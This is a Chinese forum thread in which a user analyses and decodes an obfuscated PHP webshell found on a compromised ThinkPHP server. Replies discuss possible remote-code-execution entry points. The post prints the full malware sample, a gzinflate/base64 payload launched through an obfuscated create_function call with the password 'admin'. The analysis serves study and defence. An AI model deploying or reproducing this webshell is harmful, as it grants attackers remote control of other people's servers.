分析一个常见的php大马并且解码过程
本帖最后由 drawfans 于 2020-8-13 19:03 编辑今天在逛群的时候,看到有人说服务器被中了马,截图看了一下,是一个php的大马。
看到用的是tp6框架,应该是被利用了远程执行的漏洞强行中了马。
拿到了这个马我用编辑器打开了一下,果然是一句话,一个经过ROT-13编码的php大马。
看到了利用str_rot13对字符进行解码。那方法就来啦。
简单对文件修改一下。
这个马用到了pack(),意思就是函数把数据装入一个二进制字符串,
然后放入字符以字符的形式写出来。
流程应该没错。我就放到本地测试一下。
启动了php服务。
成功。
格式化一下
完整的代码就来了。
加上原来的文件头部分代码。
运行一下。
检测了md5,这串md5不就是admin吗。。哈哈哈
验证成功。进入了面板了。
感觉传这些马的人都闲的没事情做。
就这么多了。
木马样本我就不上传了,避免不法人拿去使用。。
以上仅供经验分享,高手勿喷,嘴下留情。
2020年8月13号编辑
应要求,留下样本。
木马样本文件,请勿上传到服务器上运行。测试请在本地测试。 样本已经上传。详情请看帖子页尾。 大佬分析下这个木马呗
<?php
$password='admin';//登录密码
$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZdb5tKEH2PlP+wQVEBiTq4jaPeWJGapoTmKsapDU6TNkJ4WQw1ZumyLq3T/Pc7i+0YAzdJ/WKxO3PmzJkP2N0hjFHmMpJSxqNkouhqd3cnI1kW0cTNuMe4Ik6iACl7UZYRruy7Q2M4vOhbX6U0TL00ku5UFd3v7iD47WN0gmS5u3qaZ4R5E5JwcdqjiyiOvYPDlo4UTGepx6NxTLqoN7ww0FFL76LrKPFpniHLRp3WG3WDw2JAGHsZOTp0fYKpT5TtJ+nGCYc90zLGb297ve+Gfjvy3/p6xxl9GYWjxYjfJNPDntE2HHgeT/+dS6paQrdIXgsgXS4+XI3NOPTagwvvi/W5b4Z5zzyfYnPSweZ57tkOw99v45s30/zGDjvedcpvF/FPYlp5/9pi/iycXeYnJ9Iq0jKckDKYJ5gLhcmvKOOZIgcZxVOakkTeaFlwi6NkCsxSj2XEBaKKYLtmXlj8mBP2G0wK068yqBrKd2WDkGZC/4wzTmOaE6asTMWFfLcFFqRg+UhGKXw19E7X0D50SkKX/wClobZe9hRZgfcW+QKRzkVwyTRsdHC/JPuAPtn21UG7pX9j3xKp2+DRApdPEPsY3RccHp60dKDNXp+KPjtGf99lT0Kf0SQhRa2O0VlMMyKsmzyCnEWcCA20wlutIkZJSDyfMFCjXb3DNOHAPhNKVYHzMIoJTF9AaFBIXNN43ShE1G5CoJ8KFof6P0dVFo+l2rA5QXoj4jax1rLBSAPew3MhXr1Cyoof5AfSoT9/UOlAqNmcVVU4/fnwlccAi6IVutVEF0OzTrB0uUJ42IzrHjR8SkFWrK23hSqyqo0xhks3SiIuP3FPfhFcHXMcAplHb6XMtTiFxUtT2L041NCZM7jsX9ku/C3pvMjavugZfceGue28yH5g2M7Asgen1vDcGGjIHjjGy2gNjcGpaVi2Vtr/W0sGr3MVSgjnGu6qaJsbKMbz5QDpXGh/RfZi2HNiW7pB007lZJaKUXsfwGTVFmoRASz4b2VpWW/NIoP30SyNxXtClrUVplrvoibOkk/ijxE7TfxzIFBp/aZIgqfIzF13a410vWebNNqDcQu8OCP/E7GIBo7ieyD28FIb8ATKEsDgUsRSvIYPAoCZLKIkiD1efVEDioApCip4vuCjgvz04kaLJc5/')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'<linkrel="stylesheet"href="$#css"/>';*/ liudazhi 发表于 2020-8-15 11:17
据我所知,应该是只有TP5.0.X-5.0.23 TP5.1.X-5.1.31 这个版本的TP5有远程代码执行。而TP6的话,就好 ...
确实是远程执行,应该第三方程序开发开发过程中权限控制不妥导致的,可能非TP6本身的问题。因为我没有看到他们的log日志,暂时无法知道究竟是从哪里写入的马 优秀 主要是编码解码值得学习 思路学到了 感谢楼主的分享! 昨天下午的马马上就解密了,你是大神 厉害厉害 eval类型的加密,解密起来还是很容易的。。。
输出大法好{:301_1001:} 感觉好好玩的样子!怎么就一串乱乱的东西编程了代码了 原来是长这样